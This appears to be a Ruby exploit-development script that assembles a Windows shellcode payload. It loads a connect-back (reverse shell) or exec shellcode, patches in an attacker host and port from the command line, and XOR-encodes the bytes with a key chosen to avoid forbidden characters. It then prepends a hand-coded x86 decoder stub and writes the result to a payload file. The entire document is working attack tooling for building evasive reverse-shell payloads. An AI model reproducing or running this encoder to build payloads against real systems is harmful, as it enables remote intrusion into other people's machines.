x = eval File.read('winexec.txt')
#x = "\x90" * 1000 + "\xcc\xeb\xfe"

#if false
x = eval File.read('winconnback.rb')
require 'socket'
x[283,4] = Socket.gethostbyname(ARGV[0])[3]
x[290,2] = [ARGV[1].to_i].pack('n')
#end

x << "\x90\x90\x90"

def findxorbyte(val, forbid)
	k = [*0..255]
	forbid.each_byte { |b|
		k.delete b
		val.each { |v|
			k.delete(v ^ b)
		}
	}
	k.first
end

def findxorkey(buf, forbid)
	bla = buf.unpack('L*')
	bla = bla.map { |b| [b & 255, (b >> 8) & 255, (b >> 16) & 255, (b >> 24) & 255] }.transpose
	
	key = 'xxxx'
	4.times { |o| key[o] = findxorbyte(bla[o], forbid) }
	key
end

def xorbuf(buf, key)
	k = key.unpack('L').first
	buf.unpack('L*').map { |l| l ^ k }.pack('L*')
end

k = findxorkey x, "\x0a\x0d\0\x83\x40\x1a"
x = xorbuf(x, k)

xordec = "\xb8\x0d\xf0\xad"+"\xba\xeb\x0c\x5f"+"\x31\xc9\xb1\xff"+"\x31\x07\xaf\xe2"+"\xfb\xeb\x05\xe8"+"\xef\xff\xff\xff"
xordec[1,4] = k

File.open('l12.payload', 'w') { |fd| fd.write xordec + x }